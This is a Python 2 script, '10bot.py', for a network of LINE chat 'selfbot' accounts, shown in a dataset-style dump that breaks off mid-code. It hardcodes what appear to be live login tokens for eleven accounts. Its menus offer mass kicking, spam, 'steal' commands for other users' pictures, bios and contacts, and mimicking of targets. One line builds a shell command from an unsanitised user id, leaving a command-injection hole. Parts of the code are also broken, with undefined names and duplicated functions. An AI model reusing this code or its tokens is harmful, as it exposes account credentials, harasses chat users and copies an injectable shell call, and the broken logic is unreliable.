source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
10bot.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
cl = LINETCR.LINE() #Luffy
#cl.login(qr=True)
cl.login(token="ENB5GnSlVPfo9yxePnEc.za3+ZjFkdwx4tkMsS55p3a.pNBX3G5BOskb1p7uZ6ccnLX4v02ffs6SJVOtZpwo7Js=")
cl.loginResult()
ki = LINETCR.LINE() #Zorro
#ki.login(qr=True)
ki.login(token="EN7yezBSHf6rbeWX2DQb.O3gM/8W+lhDUWsy/dxrCUW./KqENZGdbS6jCXL9/csYrDiWx+atsUI9TNtDYNA42T8=")
ki.loginResult()
kk = LINETCR.LINE() #Sanji
#kk.login(qr=True)
kk.login(token="ENmK4EkDyqBeUyPVF1Y1.6dg+OADJcZqj0Eao0Y02iq.kAii+yvI/OT0HP5+SE7Yboww5TJh0jjyTdpRw2nIyI8=")
kk.loginResult()
kc = LINETCR.LINE() #Ussop
#kc.login(qr=True)
kc.login(token="EN8afrJ1bAco3yx1mJ02.ooURt8DAWMpy+5vsoJ0JqG.lAHw9ZL6nYKFlA0o+DWMJBahIvKLG9MYYLY8+dv9h/g=")
kc.loginResult()
ks = LINETCR.LINE() #Chooper
#ks.login(qr=True)
ks.login(token="EN2H3QkUsShdDYCz5mOb.prRZLwJqPCmMfE5IXSxJAW.8MD1eUxBFdPTQF6IlMYOdOxQYBfz7e51y4Z5byxRRR0=")
ks.loginResult()
k1 = LINETCR.LINE() #nami
#k1.login(qr=True)
k1.login(token="ENYo3GuxdzKqrEyMWlac.3eFmkgPriPKsRz7omolaVa.CjYzVK6jVKLI7OslFoxbVSbm9L7Soh/mZtWeUC8Emfs=")
k1.loginResult()
k2 = LINETCR.LINE() #nico robin
#k2.login(qr=True)
k2.login(token="END2YaEUCtQ7Lp02c1S0.TQuvGUe+OXXocehvIoIIKa.jPdpXVwhy0SduXaEchNc7z+leeXcatvTXYl+1hy34WE=")
k2.loginResult()
k3 = LINETCR.LINE() #
#k3.login(qr=True)
k3.login(token="ENgSKEEFgfrmdnFGQbQa.DXFKn4YysjJz53/2ow+nkG.rdT6PiLioXS9sbX0RwSgOWV1xic36CJfhWDFysU5XNg=")
k3.loginResult()
k4 = LINETCR.LINE() #
#k4.login(qr=True)
k4.login(token="ENEyxoOBd5NcSVZHPfJc.89ygu6799+QVSkkKJ8FV+a.WpjE+Bgn3covmnYUVSFOPOh4jKwjSzOrC8hqIcLt4aE=")
k4.loginResult()
k5 = LINETCR.LINE() #
#k5.login(qr=True)
k5.login(token="ENChfNjjbHdI2L0h2nEe.DPb0VWc+lxIi+i5T4WVCBG.ExWDQFfT+AmSUv+hsJ1xGzk9uHxiga9D0tJpYdKviBo=")
k5.loginResult()
satpam = LINETCR.LINE() #
satpam.login(token="ENED2zeV1FiQ0augucc8.+Es3tzQcdLmg7lYXW5GFIa.o2hzijbEnTrLNeA0nAbIKkMFyfHGWXt4Q/ZH41d1xGg=") #satpam
#satpam.login(qr=True)
satpam.loginResult()
print ("login success bos")
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt ✰
製作者:幻想工作室
-----------------------
-=♦·自助選單·♦=-
[•]Help
[•]Key
[•]Mimin/Min
[•]Creator
[•]Time
[•]Say....
[•]Wkwkwk/Wkwk/Wk/wkwkwk/wkwk/wk
[•]Hehehe/Hehe/He/hehehe/hehe/he
[•]Galau
[•]You
[•]Hadeuh
[•]Please
[•]Haaa
[•]Lol
[•]Hmmm/Hmm/Hm/hmmm/hmm/hm
[•]Welcome
[•]Woy
[•]wiki
[•]lyric
[•]instagram
[•]music
[•]youtube
[•]Vidio
[•]Bc
[•]Up
[•]Berapa besar cinta
[•]Apakah
[•]Siapakah cewek
[•]Siapakah cowok
[•]Adakah
[•]Cakepkah
[•]T-eng
[•]T-japan
[•]T-thai
[•]T-id
-------=====---------
✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt✰
-------=====---------
"""
Keyowner =""" ✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt✰
Owner : 幻想工作室
-----=====------------
-=♦·製作者專用選單·=-
[•]Kick ...
[•]Invite (by mid)
[•]Undang (Invite user by kontak)
[•]Adminlist
[•]Bot Add @
[•]Spam... (spam on 10 tes)
[•]Bot? (cek kontak bot)
[•]Cancel (cancel undangan tertunda)
[•]clean invites
[•]clear invites
[•]Message change:...
[•]Message add:...
[•]Message
[•]Comment:...
[•]Add comment:...
[•]Jam on/off
[•]Change clock
[•]Jam Update
[•]Status (cek status room)
[•]Sider
[•]Intip
[•]Ciduk
[•]Nk
[•]Hajar
[•]Vkick
[•]Assalammualaikum/Halo
[•]Kill
[•]Absen/Respon
[•]ifconfig
[•]system
[•]cpu
[•]kernel
[•]Debug speed
[•]Bot speed
[•]Speed respon
[•]Kurangin
[•]Rusakin
[•]Tambah
[•]Spbot
[•]Sp asl
[•]Speedbot
[•]Speed
-------=====-------
✰ ✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt ✰ ✰
-----====----------
"""
Setgroup =""" -=✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt ✰=-
-==♦·管理員專用選單·♦==-
------=====---------
[•]Cancel
[•]Buka qr/Open qr
[•]link open
[•]Tutup qr/Close qr
[•]link close
[•]Rejectall (reject semua invite)
[•]Protect:hight/low
[•]Auto blockqr:off/on
[•]Namelock:on/off
[•]Blockinvite:on/off
[•]Joinn on/off (kick protect join)
[•]Cancel on/off (cancel semua undangan)
[•]Qr on/off (protect qr)
[•]Contact On/off
[•]Join on/off (auto join bot)
[•]Gcancel:on/off (invite grup)
[•]Leave on/off
[•]Share on/off
[•]Add on/off
[•]Cancelall (canccel all invite)
[•]Comment off/on
[•]Backup:on/off
[•]Info Group
[•]ginfo
[•]Group id
[•]TL:....
[•]Gn
[•]LG
[•]LG2
[•]group list
[•]My mid
[•]Mid Bot
[•]Bot restart
[•]Turn off bots
[•]Allbio: (ganti bio stat bot)
[•]Myname: (ganti nama bot)
[•]Banlist
[•]Cek ban
[•]Kill ban
[•]Blacklist @
[•]Banned @
[•]Mid @"
[•]Unban @
[•]Ban
[•]Unban
[•]Steal group pict
[•]Steal cover @
[•]Midpict:..
[•]Steal pict
[•]Steal bio
[•]Steal mid
[•]Steal contact
[•]Mimic on/off
[•]Targetlist
[•]Mimic target
[•]Target @
[•]Del target @
[•]copy @
[•]Backup
[•]Spamcontact @
[•]GBc
[•]Pm cast
[•]Bot like
[•]Join/Masuk
[•]Bye all
[•]Pulang
[•]Bot pulang
[•]Anu:
[•]Invite me
[•]Remove all chat
[•]Admin add @ (by tag)
[•]Admin remove @
[•]Cleanse
[•]Sikat
[•]Greet
-==✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt ✰==-
製作者By. https://line.me/ti/p/abc8806191
----=====-----------
"""
KAC=[cl,ki,kk,kc,ks,k1,k2,k3,k4,k5]
DEF=[ki,kk,kc,ks,k1,k2,k3,k4,k5]
mid = cl.getProfile().mid
["u640dffcc97ca0d65f84ca992b39e4fdc"]
Amid = ki.getProfile().mid
["ua371a6fbcc3f2c776ec1263e0d745cbb"]
Bmid = kk.getProfile().mid
["ue831bfa1a7630b3409d1e00ed32d3621"]
Cmid = kc.getProfile().mid
["u38ebab4fc75ac263d8ff95523a3d2342"]
Dmid = ks.getProfile().mid
["u3d1af39568d0a5c32615ee62c6c5e36b"]
Emid = k1.getProfile().mid
["udc47cc286a51229912ad9ece30e2c0bc"]
Fmid = k2.getProfile().mid
["ub6a51582e13fa31c4e0841d588e8a290"]
Gmid = k3.getProfile().mid
["u7717e4378c984898d9e77fb6396fcd2a"]
Hmid = k4.getProfile().mid
["uf3d60653aefdf7faafb0a2a48fc7effc"]
Imid = k5.getProfile().mid
["u769074bf00bf2d7888fc8e6de30bdc6e"]
Smid = satpam.getProfile().mid
["ufde4b74d9a820e5306ecbcb1c3981f88"]
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid]
induk=["ub6f9d53713c5869f0d78e71febe13837"]
Creator=["ub6f9d53713c5869f0d78e71febe13837"]
admin=["ub6f9d53713c5869f0d78e71febe13837"]
owner=["ub6f9d53713c5869f0d78e71febe13837"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"тerima Kasih Sudah Menambahkan Aku kak",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By😊\nBabang-adhi",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"qr":True,
"Backup":False,
"AutoKick":True,
"Mimic":True,
"Protectjoin":False, # Ga Kepake(Yang Gabung langsung di kick :D) Udah Udah ada Protect Cancell
"Protectcancl":True,
"protectionOn":True,
"winvite":False,
"pname":{},
"pro_name":{},
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k1.getProfile()
backup = k1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k2.getProfile()
backup = k2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k3.getProfile()
backup = k3.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k4.getProfile()
backup = k4.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k5.getProfile()
backup = k5.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print ("[Command] Tag All")
try:
cl.sendMessage(msg)
except Exception as error:
print (error)
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print ("[Command] Tag All")
try:
cl.sendMessage(msg)
except Exception as error:
print (error)
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise (e)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print (error)
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ☞ ' + Name
wait2['ROM'][op.param1][op.param2] = '☞ ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = k1.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
k1.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?")
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in Creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Creator:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Creator:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Creator:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Creator:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Creator:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Creator:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Creator:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in mid:
if op.param2 in Amid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Fmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Gmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Hmid:
cl.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Imid:
cl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Amid:
if op.param2 in mid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Cmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Dmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Emid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Fmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Gmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Hmid:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Imid:
ki.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Bmid:
if op.param2 in mid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Fmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Gmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Hmid:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Imid:
kk.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Cmid:
if op.param2 in mid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Amid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Emid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Fmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Gmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Hmid:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Imid:
kc.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Dmid:
if op.param2 in mid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Amid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Bmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Cmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Fmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Gmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Hmid:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Imid:
ks.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Emid:
if op.param2 in mid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Amid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Bmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Cmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Dmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Fmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Gmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Hmid:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Imid:
k1.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Fmid:
if op.param2 in mid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Amid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Bmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Cmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Dmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Emid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Gmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Hmid:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Imid:
k2.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Gmid:
if op.param2 in mid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Amid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Bmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Cmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Dmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Emid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Fmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Hmid:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Imid:
k3.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Hmid:
if op.param2 in mid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Amid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Bmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Cmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Dmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Emid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Fmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Gmid:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Imid:
k4.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Imid:
if op.param2 in mid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Amid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Bmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Cmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Dmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Emid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Fmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Gmid:
k5.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Hmid:
